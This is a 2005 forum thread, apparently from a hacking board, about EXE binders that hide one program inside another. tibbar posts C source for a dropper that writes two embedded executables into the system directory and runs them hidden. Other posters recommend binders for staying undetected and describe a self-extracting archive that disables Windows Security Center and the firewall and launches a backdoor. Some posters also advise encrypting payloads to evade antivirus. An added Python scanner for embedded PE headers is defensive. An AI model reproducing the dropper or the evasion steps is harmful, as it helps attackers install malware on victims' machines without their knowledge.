sk3tch
I'm on to phase two of my anti-virus research. This part involves EXE binders/joiners: the apps that let you take, say, cmd.exe and join another executable to it, so that when someone clicks on cmd.exe it also opens the other file.

Anyway, if you've clicked on the link, hopefully you know what I'm talking about.

Please list the top binders/joiners that you like to use and/or links to top ones.

Thanks!
G777
I don't use any, but if I remember correctly Fusion is quite good.
tibbar
If I were an evil virus maker, the only binder I would consider is one that will never be detected. So that would be a custom EXE made as follows:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>

/* Raw bytes of the two executables to be dropped (elided in the post) */
const unsigned char hex1[] = {
0x4D,0x5A,...,0x5A};
const unsigned char hex2[] = {
0x4D,0x5A,...,0x6A};
const unsigned int len1 = 65536;
const unsigned int len2 = 76636;

int main()
{
   HANDLE file;
   char sysdir[MAX_PATH];
   char newfile1[MAX_PATH];
   char newfile2[MAX_PATH];
   DWORD written;

   /* Build the paths of both dropped files inside the system directory */
   GetSystemDirectory(sysdir, MAX_PATH);
   sprintf(newfile1, "%s\\%s", sysdir, "newfile1.exe");
   sprintf(newfile2, "%s\\%s", sysdir, "newfile2.exe");

   /* Write the first embedded executable to disk and launch it hidden */
   file = CreateFile(newfile1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
   WriteFile(file, hex1, len1, &written, 0);
   CloseHandle(file);
   ShellExecute(0, "open", newfile1, NULL, NULL, SW_HIDE);

   /* Same for the second embedded executable */
   file = CreateFile(newfile2, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
   WriteFile(file, hex2, len2, &written, 0);
   CloseHandle(file);
   ShellExecute(0, "open", newfile2, NULL, NULL, SW_HIDE);

   ExitProcess(0);
   return 0;
}


I have no idea who originally came up with this, but credits to whoever that might be.
aelphaeis_mangarae
Nice source, tibbar (yes, I know you didn't write it).

I would have to agree that the best binder is the one you code yourself; it is essential for a binder to be undetected.


Although if you're talking about public binders, I would have to say Micro-Bind... well, I think that's what it's called.

FBI Binder is also pretty good...
alibaba
xp also comes with a binding tool: iexpress.exe
Partizaan
iexpress.exe is a packer (self extracter) not a binder.
rageinc
What I do is make a WinRAR SFX. You put two files in it and also a batch file that runs hidden (compiled with Tebic). Then, after the batch is run, it executes both and exits. You can also add other useful things to the batch job, like disabling the WinXP Security Center and firewall, or killing a list of programs, etc. I also add a file called config.dat that just has the line:
CODE
add: none

Where it says none I can put the name of an .exe and add it to the SFX, or leave it as none and let the backdoor run alone. You can also add pictures, etc. I can post the script later if anyone is interested. Peace.
belgther
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and heuristic analysis will also detect the malicious code too, since it's not packed at all.
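The point belgther makes is structural: a binder of the kind tibbar posted compiles the payload executables in as raw byte arrays, so each one keeps its own DOS header, e_lfanew pointer and PE signature intact inside the carrier. The scanner below is an added example, not code from this thread or from any of the binders named in it; it walks a file for every "MZ", follows e_lfanew, and reports a hit only where a valid "PE\0\0" signature and COFF header follow. The carrier, the two payloads and the XOR key are all constructed test input (minimal PE-shaped stubs, not real programs), and the repeating-key XOR stands in for the generic "encrypt the binaries" step, to show why that defeats a header scan.

```python
import struct
from itertools import cycle

PE_SIG = b"PE\x00\x00"

# IMAGE_FILE_HEADER.Machine values from the PE spec, used only to label hits
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64"}


def find_pe_headers(blob: bytes) -> list:
    """Return (offset, machine) for every plausible PE image inside blob.

    For each 'MZ' occurrence, read e_lfanew (DOS header offset 0x3C) and
    accept the hit only if it points, within the blob, at a 'PE\\0\\0'
    signature followed by a complete 20-byte COFF file header.
    Offset 0 is the carrier executable itself.
    """
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # e_lfanew must land past the DOS header, stay inside the blob and
            # leave room for the 4-byte signature plus the COFF header
            if (0x40 <= e_lfanew <= 0x400 and pe + 24 <= len(blob)
                    and blob[pe:pe + 4] == PE_SIG):
                machine = struct.unpack_from("<H", blob, pe + 4)[0]
                hits.append((pos, machine))
        pos = blob.find(b"MZ", pos + 1)
    return hits


def embedded_payloads(blob: bytes) -> list:
    """Hits other than the carrier at offset 0, i.e. the bound-in executables."""
    return [hit for hit in find_pe_headers(blob) if hit[0] != 0]


def make_pe_stub(machine: int, body_len: int) -> bytes:
    """Constructed, non-runnable PE-shaped image used as test input:
    64-byte DOS header with e_lfanew = 0x40, 'PE\\0\\0', a COFF file header
    carrying `machine`, then body_len zero bytes standing in for sections."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, 0)
    return bytes(dos) + PE_SIG + coff + bytes(body_len)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the simplest form of 'encrypt the binaries'."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Constructed sample: a carrier stub followed by two appended payloads, the
# layout a binder produces once the payload byte arrays are compiled in.
CARRIER = make_pe_stub(0x14C, 200)
PAYLOAD1 = make_pe_stub(0x14C, 300)
PAYLOAD2 = make_pe_stub(0x8664, 500)
KEY = b"\x5a\xa5\x3c"  # arbitrary constructed key

PLAIN_BINDER = CARRIER + PAYLOAD1 + PAYLOAD2
XOR_BINDER = CARRIER + xor_bytes(PAYLOAD1, KEY) + xor_bytes(PAYLOAD2, KEY)

if __name__ == "__main__":
    for name, blob in (("plain binder", PLAIN_BINDER), ("xor-wrapped binder", XOR_BINDER)):
        hits = embedded_payloads(blob)
        print(f"{name}: {len(hits)} embedded PE image(s)")
        for off, machine in hits:
            print(f"  offset 0x{off:x}  machine {MACHINE_NAMES.get(machine, hex(machine))}")
```

On the plain sample the scan finds both payloads at their exact offsets and reads each one's Machine field; on the XOR-wrapped sample it finds nothing after the carrier, which is tibbar's counter-point in concrete form. Following e_lfanew rather than matching "MZ" alone is what keeps a real carrier, whose code and data will contain stray "MZ" byte pairs, from producing false positives. Once the payloads are wrapped, the static evidence that remains is the drop-and-run behaviour itself (a file written to the system directory and immediately executed), which is a runtime check rather than a byte scan.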
PsyXhO
I googled for Fusion, FBI Binder and Micro-Bind, but either found nothing or very old sites with 404s at the end of the links. Do you know the name of a binder that just binds two EXEs into one? It doesn't matter if it's detectable by an anti-virus, as I'm just simplifying something I normally use .bat files to do...
Thanks
sefe
MicroJoiner is my favourite: written in asm, easy to use, powerful, and I can make it undetectable.
spikje
The best and most complete binder available is Hammer Binder 3.
It can run hidden apps, melt after run, download from the web, edit the registry and much, much more.
tibbar
QUOTE(belgther @ Jun 15 2005, 04:10 AM)
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and heuristic analysis will also detect the malicious code too, since it's not packed at all.

In theory you are right. In practice, none of the AV on the market detect this technique.

Besides, you can always encrypt the binaries.
Invision Power Board © 2001-2005 Invision Power Services, Inc.